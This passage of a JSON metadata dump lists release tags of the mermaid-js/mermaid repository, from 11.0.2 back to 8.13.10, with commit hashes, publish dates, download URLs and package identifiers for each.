2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmer